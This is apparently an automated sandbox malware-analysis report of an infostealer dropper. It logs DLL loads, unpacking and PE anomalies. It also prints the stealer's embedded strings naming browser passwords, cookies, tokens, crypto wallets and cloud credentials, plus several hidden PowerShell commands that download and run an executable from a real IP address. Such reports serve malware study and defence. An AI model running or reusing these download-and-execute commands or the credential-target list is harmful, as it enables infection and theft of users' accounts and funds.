Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll

Source: C:\Users\user\Desktop\hHtR1O06GH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Slides.lnk.34.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.34.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.34.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.34.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.34.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.34.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: hHtR1O06GH.exe

Static file information: File size 2146304 > 1048576

Source: hHtR1O06GH.exe

Static PE information: Raw size of bxgyntvf is bigger than: 0x100000 < 0x1a0000

Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: C:\Users\Joker\source\repos\Handler\Handler\obj\Release\Handler.pdb source: Ta3ZyUR.exe, 00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, Ta3ZyUR.exe, 00000008.00000000.1953939827.00000000009F2000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: aS@C:\CrypterX1\FolderProjectCompiled\WindowsProject8\Release\name.pdb source: qFqSpAp.exe, 0000000E.00000000.2042354432.00000000015E0000.00000002.00000001.01000000.0000000D.sdmp, qFqSpAp.exe, 0000000E.00000003.2049614926.000000000380C000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000002.2169949820.00000000015E0000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: Phantom.pdb\ source: WER89C1.tmp.dmp.20.dr
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE, 0000002A.00000002.2513739175.0000000000CA2000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: mscorlib.pdb0 source: WER9B17.tmp.dmp.26.dr
Source:	Binary string: C:\Users\Admin\source\repos\Phantom\Phantom\obj\Release\Phantom.pdb source: jROrnzx.exe, 00000010.00000002.2193761654.0000000003C09000.00000004.00000800.00020000.00000000.sdmp, jROrnzx.exe, 00000010.00000000.2143152760.00000000006F2000.00000002.00000001.01000000.0000000F.sdmp, jROrnzx.exe.4.dr, 7aencsM.exe.4.dr
Source:	Binary string: Phantom.pdb$ source: WERF339.tmp.dmp.64.dr
Source:	Binary string: System.Windows.Forms.pdb` source: WER419C.tmp.dmp.12.dr
Source:	Binary string: System.pdb source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: mscorlib.pdbh source: WERF339.tmp.dmp.64.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: mscorlib.pdbL0Tw# source: WER419C.tmp.dmp.12.dr
Source:	Binary string: C:\CrypterX1\FolderProjectCompiled\WindowsProject8\Release\name.pdb source: qFqSpAp.exe, 0000000E.00000000.2042354432.00000000015E0000.00000002.00000001.01000000.0000000D.sdmp, qFqSpAp.exe, 0000000E.00000003.2049614926.000000000380C000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000002.2169949820.00000000015E0000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: vdr1.pdb source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: Phantom.pdb$h source: WER9B17.tmp.dmp.26.dr
Source:	Binary string: mscorlib.pdb source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: System.Windows.Forms.pdbL0Tw# source: WER9B17.tmp.dmp.26.dr
Source:	Binary string: mscorlib.ni.pdb source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: Handler.pdb source: WER419C.tmp.dmp.12.dr
Source:	Binary string: Handler.pdba source: WER419C.tmp.dmp.12.dr
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: Phantom.pdb source: WER89C1.tmp.dmp.20.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: System.ni.pdb source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Unpacked PE file: 0.2.hHtR1O06GH.exe.ed0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bxgyntvf:EW;pcvkkvdt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bxgyntvf:EW;pcvkkvdt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.450000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bxgyntvf:EW;pcvkkvdt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bxgyntvf:EW;pcvkkvdt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 4.2.skotes.exe.450000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bxgyntvf:EW;pcvkkvdt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bxgyntvf:EW;pcvkkvdt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Unpacked PE file: 15.2.m5UP2Yj.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fjzodoul:EW;rhrkzbru:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fjzodoul:EW;rhrkzbru:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Unpacked PE file: 42.2.TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE.ca0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oxaitfam:EW;pgbyiblb:EW;.taggant:EW; vs :ER;.rsrc:W;

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

Source: Ta3ZyUR.exe.4.dr

Static PE information: 0xD48B4FD1 [Wed Dec 30 23:42:09 2082 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: jROrnzx[1].exe.4.dr	Static PE information: real checksum: 0x0 should be: 0xb2179
Source: DTQCxXZ.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x6219a
Source: Ta3ZyUR[1].exe.4.dr	Static PE information: real checksum: 0x11706 should be: 0x58f44
Source: 7aencsM[1].exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x48d4c
Source: Ta3ZyUR.exe0.4.dr	Static PE information: real checksum: 0x11706 should be: 0x58f44
Source: m5UP2Yj.exe.4.dr	Static PE information: real checksum: 0x1c2936 should be: 0x1c1b78
Source: random[1].exe0.4.dr	Static PE information: real checksum: 0x1ce77a should be: 0x1d4024
Source: hHtR1O06GH.exe	Static PE information: real checksum: 0x20d643 should be: 0x214940
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x20d643 should be: 0x214940
Source: d2YQIJa.exe.4.dr	Static PE information: real checksum: 0x1f9b28 should be: 0x1f6e6f
Source: 7b63166ddf.exe.4.dr	Static PE information: real checksum: 0x1ce77a should be: 0x1d4024
Source: 7aencsM.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x48d4c
Source: m5UP2Yj[1].exe.4.dr	Static PE information: real checksum: 0x1c2936 should be: 0x1c1b78
Source: Ta3ZyUR.exe.4.dr	Static PE information: real checksum: 0x11706 should be: 0x58f44
